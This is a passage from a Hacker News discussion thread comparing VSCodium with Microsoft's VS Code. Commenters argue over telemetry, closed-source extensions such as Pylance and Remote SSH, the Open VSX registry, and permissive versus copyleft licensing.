| Microsoft and is oriented specifically around Visual
| Studio Code's model of remote development.)
| vladvasiliu wrote:
| Sure I do, and I enjoy flaming the occasional Emacs user
| I cross paths with.
|
| But why does selling those features, especially the ones
| requiring a separate cloud subscription, require a
| specific build of an app which is otherwise open source?
| bitwize wrote:
| Flip it on its head, the question is, why even do an open
| source release? The answer is, it's pretty much a sop,
| much like Apple's Darwin releases or the AOSP. Good PR
| for the open source community to build trust and good
| will, while still controlling the whole platform from
| soup to nuts making EEE possible. If they opened up their
| dev tools -- their LSPs and cloud service connectivity --
| to just anybody they risk losing that control.
|
| Honestly, the more I learn about Visual Studio Code the
| more I understand why Emacs is the way it is. Stallman
| was trying to keep it fully hackable forever.
| vladvasiliu wrote:
| I admit, I didn't think about it under that angle.
|
| But I do wonder how much VS Code being "kinda open
| source" mattered. I may be in an MS-centric bubble, but
| most people I interact with couldn't care less about
| that. They're using closed-source software all over.
| Their main reasons for switching to VS Code seem to be
| the _free-as-in-beer_ part, and that it 's more practical
| than the OG VisualStudio. They're 99% Windows devs.
| nerdponx wrote:
| Upsells like Copilot, telemetry data mining, investing in
| the goodwill of an entire generation of programmers, and
| presumably further plans related to enterprise products.
| foob wrote:
| This is separate from the telemetry, but I suspect that
| part of the roadmap is for LSP extensions to become
| monthly subscription services eventually. We currently
| see hints of that from two directions: 1) the
| introduction of GitHub Copilot as a paid service, and 2)
| the aforementioned move towards proprietary and DRM
| protected LSPs. It's not hard to imagine how these two
| might converge in the future. I'm sure that the
| performance of these LSPs will be extremely impressive
| and that it will be rational for many individual
| developers to pay for them. This will in turn pull mind
| share and community involvement away from FOSS solutions,
| and the gap between the two will widen over time as a
| result.
| vladvasiliu wrote:
| Oh, I'm not at all against companies making a buck
| selling software. I'm a happy JetBrains customer for my
| IDE needs, and I'm not even a "professional" developer.
|
| But why would they force the use of their "official" VS
| Code build for this? Couldn't they just charge for their
| "impressive" plugins, regardless of the edition of VS
| Code used? The JetBrains "community" IDEs (open source
| and gratis) can use paid plugins from their marketplace.
| foob wrote:
| I'm not against selling developer tools either, but I do
| have a problem with EEE as a strategy. As far as I know,
| JetBrains has never engaged with this behavior and they
| have coexisted in a healthy way with fully open source
| alternatives. The point of Microsoft's strategy isn't to
| only produce a better product, but to actively hurt open
| alternatives by driving down their adoption through
| insidious and disingenuous means. They're not just trying
| to compete in the market, they're trying to monopolize
| it.
|
| The idea behind LSP and Microsoft's initial open source
| work on LSP were both excellent. That launched seven
| years ago, and I don't think that we would have seen the
| near universal adoption of LSP among open source editors
| nor the dominance of VS Code among developers if they had
| been paid products from the start. Now that they have a
| large enough market share, they can make the LSP engines
| proprietary without most developers even noticing. The
| gap between the proprietary and open source solutions can
| now be widened both by the open source community
| shrinking and by Microsoft pumping money into improving
| their LSP engines. The more that gap widens, the more
| people migrate to VS Code from open alternatives. That
| becomes a self-reinforcing loop.
|
| Once VS Code is significantly better than open source
| alternatives and they have a huge market share, Microsoft
| is in a very strong position to start collecting rent.
| Switching costs on an editor are nontrivial to begin
| with, and are enhanced by the induced atrophy of open
| source alternatives. Despite the fact that this strategy
| takes more than a decade to execute, I would guess that
| it ends better for Microsoft overall than if they were to
| start charging for VS Code back in 2016.
| nerdponx wrote:
| Maybe instead of "embrace, extend, extinguish", it's
| "promote, extend, prevent competitors from extending,
| then charge for extensions".
|
| Paid monthly premium LSP subscription honestly would be a
| great idea from a business perspective, even though it's
| distasteful.
| croes wrote:
| It's just MS as we know it.
|
| They didn't really change, they got just better in PR.
| mcpackieh wrote:
| Seems like every generation has to learn the hard way.
| CameronNemo wrote:
| Developers! Developers!! DEVELOPERS!!! DEVELOPERS!!!!
| juniperplant wrote:
| https://youtu.be/XxbJw8PrIkc?si=1FUhvPxAu4kKdwvX
| CameronNemo wrote:
| I didn't link to it because you can't unsee Ballmer and
| unhear his voice cracks.
| jeanp413 wrote:
| There's https://open-vsx.org/extension/jeanp413/open-remote-ssh
| and https://open-vsx.org/extension/jeanp413/open-remote-wsl
| tecoholic wrote:
| Yup. I tried Codium and gave up after I couldn't connect to the
| docker containers for debugging. It's pretty much the only use
| for VS Code I have and Codium can't do that.
| pama wrote:
| I hope that more people try Emacs after having had exposure to
| vscode. It may be slow to get to know the new environment, and
| reading the manual only takes one so far, but Everything
| becomes nicer after the training phase. Text-based remote
| editing has been mature in this platform for decades, and it
| keeps working well with the addition of all the language
| servers and tree sitters and so on. It is now snappy again in
| all architectures, it has built-in support for sql and still
| uses the powerful lisp for all its extensions.
| hedora wrote:
| Today is your lucky day!
|
| "Open Remote - SSH" by "jeanp413" aka: @ext:jeanp413.open-
| remote-ssh
|
| works just like the closed source one, at least for me.
|
| I'm using the vscodium AUR package under manjaro. I got the
| extension from whatever store vscodium defaults to. I'm not
| sure if it is available in Microsoft's store.
|
| The extension didn't work for me under Code - OSS (there was an
| apparent configuration error, and I didn't bother tracking it
| down).
| gostsamo wrote:
| thanks, will check it out
| zikduruqe wrote:
| Mine broke a few weeks ago (MacOS - Open Remote - SSH
| v0.0.42). What version are you running and are you connecting
| to your remote hosts via your ssh config file or using
| username@ip?
|
| Just curious, since I cannot get it to connect to any hosts.
| api wrote:
| The alternative is Jetbrains, Nova, vim, etc.
| rahoulb wrote:
| I don't know about JetBrains but I have tried to replicate my
| VSCode + Remote Containers extension workflow in vim and Nova
| (which I absolutely love) and not got anywhere near.
| HankB99 wrote:
| If I switch from VS Code to VSCodium, will I notice anything
| different - assuming the telemetry is not really visible to me
| and I ignore the branding?
|
| Will the plugins - some provided by MS - still work as expected
| or will those be blocked or hobbled?
|
| Thanks!
| BossingAround wrote:
| From my experience, the UI is very slightly different, with
| some options/functionality missing here and there (from what I
| remember, for example, you couldn't enlarge the font size of
| the menus).
|
| The plugins won't work out of the gate, but you can installed
| them manually and most of them will work.
|
| It's not a 1:1 replacement, and from my limited experience, the
| UX of VSCodium was worse than that of VSCode. But, if you value
| not being tied to MS... That's the price you're gonna pay.
| hedora wrote:
| Are you sure you weren't using an older version of one? I see
| no practical difference between code on macos and vscodium on
| Linux (except that I prefer Linux's font renderer, and the
| ctrl key moved).
| codethief wrote:
| In my experience all extensions will work & will be installable
| right from the in-app marketplace, provided that you follow
| https://news.ycombinator.com/item?id=37382473
|
| There was a ticket somewhere in the issue tracker with more
| information about this topic.
| whalesalad wrote:
| Remote SSH dev does not work.
| jeanp413 wrote:
| There's https://open-vsx.org/extension/jeanp413/open-remote-
| ssh it works in most cases
| hedora wrote:
| I'm using that, and haven't noticed any differences between
| vscodium and the closed source one (other than the removal
| of telemetry).
| replete wrote:
| I switched to vscodium two years ago and I haven't had any
| problems
| wheelerof4te wrote:
| > Will the plugins - some provided by MS - still work as
| expected or will those be blocked or hobbled?
|
| Nope. Only some.
| trelane wrote:
| What about the other way: will plugins designed for VSCodium
| work in VSCode?
| ReleaseCandidat wrote:
| There is no such thing as "designed for VSCodium". You can
| publish your extension on Open VSX only instead of in the
| MS Marketplace.
| trelane wrote:
| > You can publish your extension on Open VSX only instead
| of in the MS Marketplace.
|
| So to use an extension in VSCode, it has to be published
| in Microsoft's store? And VSCode only in this other
| store?
| ReleaseCandidat wrote:
| > So to use an extension in VSCode, it has to be
| published in Microsoft's store?
|
| You can always download the extension (or build it
| yourself) and install it manually - using Code or Codium.
| You can use the Open VSX registry with Code, but you have
| to configure it:
| https://github.com/eclipse/openvsx/wiki/Using-Open-VSX-
| in-VS.... So it technically does not have to be in MS'
| Marketplace, but 99% of Code user will not find or know
| of your extension, if it isn't in the Marketplace.
| hooverd wrote:
| Pylance won't. There's the EEE you're looking for.
| codethief wrote:
| IIRC there was a ticket somewhere in the issue tracker where
| someone explained in the comments how to get Pylance to work.
| Wasn't particularly difficult.
| CameronNemo wrote:
| Just use the open source python LSP that is written in
| Python and maintained by the Spyder IDE team.
|
| https://github.com/python-lsp/python-lsp-server
|
| Someone might come along and tell you that you are missing
| out on some pylance features, but fuck closed source dev
| tooling it ain't worth it.
| hooverd wrote:
| For now. Who knows how long it be before it only runs
| against a signed Microsoft VSCode binary?
| wheelerof4te wrote:
| So, this is basically what you would get when you download and
| build Visual Studio Code's source code.
|
| The name is probably a world play similar to Chrome -> Chromium.
| A mini rant, if I may:
|
| Microsoft's (and Google's, lol) practice of "open-sourcing" their
| products, but releasing a product which has "an added closed-
| source functionality" is dishonest at best and worthy of a giant
| lawsuit at worst.
| o1y32 wrote:
| "worthy of a giant lawsuit"
|
| Wow, that's a bold claim. Unless vscode and other products are
| improperly using GPL-licensed or not following license
| requirements otherwise -- which I am not aware of -- Microsoft
| is doing nothing wrong here, just like countless other
| commercial companies that release proprietary software based on
| open source projects.
| Matumio wrote:
| Pretty sure they use "open source" in a fair way here. Others
| are able to grab their sources and legally publish builds that
| are pretty much identical (up to the telemetry...).
|
| What you're looking for is the "anti-features" distinctions,
| like the F-Droid store does it. E.g. "This app depends on other
| non-free apps." or "Promotes or depends entirely on a non-free
| network service."
| josephcsible wrote:
| > builds that are pretty much identical
|
| Not quite. Try running Pylance on a build of your own.
| jraph wrote:
| Not to mention that you are supposed not to use the
| official vscode extension repository if you don't use the
| official vscode build IIRC.
| candiddevmike wrote:
| It's the open enshitification model
| paulryanrogers wrote:
| How so? If it remains consistently open core then I don't see
| it. They'd have to make the open part progressively worse.
| hedora wrote:
| It is a platform play, where the platform increasingly
| becomes incompatible with the open core stuff.
|
| The value of a lot of software comes from interoperability,
| not from the code itself.
|
| For instance, try running AOSP and 100% open source system
| libraries on your android phone for a month. You will find
| that you cannot perform basic financial transactions, like
| paying for parking, or hailing an uber/lyft, fast-charge
| your car, attend concerts without paying an extra fee, etc,
| etc.
|
| I don't even want my phone to support any of the above
| crap, but I don't get to dictate how the US economy is
| structured, so I have no choice but to need all that stuff
| to work.
| lozenge wrote:
| It is progressively worse now.
|
| What used to be useful extras are now considered essentials
| (see how many on this thread say they need the SSH, Docker
| or WSL extensions and can't use VSCodium).
|
| Plus they're now moving Python, .NET and other specific
| extensions towards closed source. Yeah, you can use the
| open source versions, but they don't have mindshare any
| more so source code written with one might not
| navigate/display as well with the other.
|
| Also, new features only land when MS has a closed source
| idea that can use it, and are locked to MS extensions only.
| Innovation for me, not for thee. (Copilot/Continue on
| Codespaces/Live Share/VS Code Web/...)
| wheelerof4te wrote:
| "Plus they're now moving Python, .NET and other specific
| extensions towards closed source."
|
| They are also adding Python support to Excel, which means
| that the layman now has a intuitive way to use a Python
| function to plot graphs inside their favorite workbook.
|
| In other words, now you no longer need those extra
| machine learning Python devs, when Bob the accountant can
| plot fancy graphs for you.
|
| Talk about extending an open source project just to
| incorporate it into the Borg that is closed-source Excel.
| bmitc wrote:
| What is dishonest about it, and what would you sue them for? I
| don't think you can sue for "open sourced a product and
| released it for free but it's not what I like".
| wheelerof4te wrote:
| "open sourced a product and released it for free but it's not
| what I like"
|
| Open sourced a product and released a different product that
| has built-in tracking, is a walled garden for extensions and
| who knows what else.
|
| An elaborate fraud.
| djbusby wrote:
| Where is the fraud?
| wheelerof4te wrote:
| Let us imagine there is one chocolate product.
|
| The producer gives you two options to aquire that
| chocolate.
|
| First option is a pile of ingredients, a plain plastic
| wrapper and a recipe. You are obviously required to make
| the chocolate yourself, but what you get is the original
| chocolate as advocated by the company.
|
| Second option is a finished product that has a pretty
| decorated package and tastes a bit different than
| original chocolate. You can't quite put your finger on
| why, but at least you don't have to make it yourself!
|
| Maybe "fraud" is a bit too strong word. We could go with
| "consumer deceit" instead.
| paulryanrogers wrote:
| They don't claim to be entirely open, and open isn't a
| regulated term regardless.
| stonogo wrote:
| Being within the bounds of literal and legal correctness
| and acting like an asshole, it turns out, are not
| incompatible!
| paulryanrogers wrote:
| I don't see this as asshole behavior. They're giving away
| an overwhelming amount for free, which the community or a
| competitor can build upon at any time. This project being
| an example.
|
| For those who find the closed capabilities and extensions
| distasteful there is opportunity to make their own.
| stonogo wrote:
| I've got several decades of experience with the things
| Microsoft has given away for free. I consider this to be
| an (entirely on-brand and consistent) asshole move, part
| of the same EEE cycle we've been through a dozen times
| with a dozen product lines. It's enough to keep me off
| even the open-source rebuild of the product.
| bmitc wrote:
| https://code.visualstudio.com/docs/getstarted/telemetry
|
| The point of this comment is that the telemetry is
| documented and able to be disabled.
| rstat1 wrote:
| People don't really care about facts. Only the next thing
| to be outraged by.
| jzb wrote:
| The source is available. You have the right to fork it. If
| there's something in the propriety release that's harmful,
| you might have a case - but all Microsoft is doing here is
| counting on people being willing to consume the builds
| rather than coming together to use the source code.
|
| Basically: Microsoft is betting that people care more about
| free as in beer than exercising software freedom. So far,
| they seem to be correct.
| TheRealPomax wrote:
| This is literally what the MIT license is for: it lets
| people take the source code, _modify it_ , and then
| distribute that. As a paid product even, if that's what you
| want to do.
|
| This isn't fraud, this is literally MS going "here's the
| MIT licensed version, and here's our own variant of that,
| based on obeying that license." And then they go one step
| further and say "We're not going to tell you that only our
| product exists, we are explicitly telling you where to get
| the MIT licensed source code, which isn't even an MIT
| license requirement".
|
| This is _exactly_ what good open source practices look
| like.
| mcpackieh wrote:
| It's a typical and completely compliant way to use the
| MIT license, but _good_ open source practice? I don 't
| think so. The MIT license permitting this sort of thing
| is why I and many others consider the MIT license to be a
| "cuck license":
|
| > _A Cuck License is a permissive software license that
| that does not enforce the freedom of derivative works.
| This means that anyone can take software licensed under a
| Cuck License and turn it into proprietary software,
| effectively cucking the original author._
|
| > _Examples of Cuck Licenses are the MIT license and BSD
| license._
|
| > _Cuck License consequences:_
|
| > _There have been instances where developers 's usage of
| Cuck Licenses has backfired. One notable example is
| Andrew Tanenbaum' MINIX, which got taken by Intel and
| turned into spyware called the Intel Management Engine.
| Tanenbaum went on to say:_
|
| > _" Many people (including me) don't like the idea of an
| all-powerful management engine in there at all (since it
| is a possible security hole and a dangerous idea in the
| first place), but that is Intel's business decision and a
| separate issue from the code it runs. A company as big as
| Intel could obviously write its own OS if it had to."_
|
| > _However, Tanenbaum maintains that he made the correct
| choice licensing MINIX under the 3-clause BSD License._
|
| https://wiki.installgentoo.com/wiki/Cuck_license
| bmitc wrote:
| That's implying that GPL is the only good license?
| mcpackieh wrote:
| No, any copyleft license is a better open source license.
| In fact, proprietary licenses are better as well; with
| MIT or BSD licenses you are writing code that a
| corporation will make proprietary, effectively writing
| proprietary code for them, except you don't get paid for
| it. It would be better to use a proprietary license and
| get paid than to use the BSD/MIT license, have your code
| turned into that same proprietary product, and not even
| get paid for it.
|
| Even giving your code to the public domain is better than
| an MIT or BSD license; corporations will still be able to
| make it proprietary but at least it clears the air around
| the 'interesting question' of mixing MIT/BSD code into a
| copyleft project and distributing the whole lot under a
| copyleft license.
| uw_rob wrote:
| Quality contribution to the collective knowledge of
| humanity by the installgentoo wiki.
| o1y32 wrote:
| You can have this rant as you please but that doesn't
| change the fact that Microsoft is following the what the
| license requires and did nothing wrong.
| croes wrote:
| The part of hindering access to the market place and DRMing
| some extensions is the dishonest part.
| jodrellblank wrote:
| _Their_ marketplace, not _the_ marketplace. Their
| extensions. Microsoft 's extensions for Microsoft's editor
| shared in Microsoft's marketplace. And if it's dishonest,
| where did they say otherwise?
| croes wrote:
| Microsoft's marketplace but definitely not all extensions
| are theirs.
|
| What is the reason that Codium can't access the
| extensions? That's like Edge wouldn't be allowed to load
| extensions from the Chrome store.
| coliveira wrote:
| You're 100% correct. Google and Apple started this trend, and
| MS perfected it: just say you're creating "open source"
| products, but release a closed source version. These mega
| companies still benefit from the work of clueless software
| engineers who donate their time to the open source product, but
| what the mega corps deliver to end users is the closed source
| version.
| o1y32 wrote:
| Nothing "clueless", I don't know what you are talking about.
| If people release/contribute to code under MIT license, they
| are very well aware that anyone on any projects -- open
| source projects, proprietary software -- can use their code
| as long as there is a copy of the copyright notice. Otherwise
| they should release it under GPL or something similar, or
| spend their time elsewhere. It's all clear and fair game and
| working as intended for decades.
| knallfrosch wrote:
| I wasn't clueless when I built a tiny functionality into
| Code-OSS and I'm fine with Microsoft (or M$?) slapping
| telemetry on VSCode. You know, the crash reporter and usage
| statistics are the foundation of this incredible
| product/software. People use that software for free and they
| can disable telemetry at any time.
|
| I'd rather work a week on VSCode for free than spending a day
| looking at Jetbrains' Java font rendering or waiting for
| Visual Studio to start.
| drcongo wrote:
| Serious question - no snark just genuine ignorance, what
| products have Google and Apple done this with?
| kiwijamo wrote:
| Google - Android. Apple - Darwin, Webkit, etc.
| Liquix wrote:
| Apple released OS X/Darwin open source, but kept the
| moneymaking frameworks (cocoa, carbon) closed source. This
| generated positive PR while keeping the secret sauce needed
| to ship polished applications under lock and key
|
| Google released Android open source, but then made
| unlocking bootloaders and flashing devices as difficult as
| possible for laymen. So they get to point at AOSP and say
| "open source" but in practice the vast majority of users
| end up running proprietary builds with big G's telemetry
| baked in
| dataangel wrote:
| This is just incorrect regarding Google. The phones they
| actually make, the Pixel ones, have open bootloaders.
| noman-land wrote:
| Chromium also?
| travisgriggs wrote:
| I use both VSCode and VSCodium. For a simple and pragmatic
| reason. Configuration management and multiple distinguishable
| windows.
|
| My VSCode is completely subsumed by the butt load of extensions
| that seems to be necessary to do work with
| Microchio/Atmel/zephyr.
|
| And I use VSCodium for ansible/elixir work.
| the_biot wrote:
| That seems pretty elaborate just to maintain two different
| environments.
|
| Doesn't VSCodium have something like browser profiles, where
| you can customize all kinds of things only in that profile? I
| use this in Firefox all the time, windows looks different etc.
| merdaverse wrote:
| They recently added profiles in VSCode for this very use
| case. I have a bunch of them configured for different tech
| stacks (they only differ by extensions)
| orangea wrote:
| I'm not sure if VS Codium has profiles like that, but Nix can
| be used to create them. There is support for configuring an
| installation of VS Code in the Nix language and using it as a
| package.
___________________________________________________________________
(page generated 2023-09-04 23:00 UTC)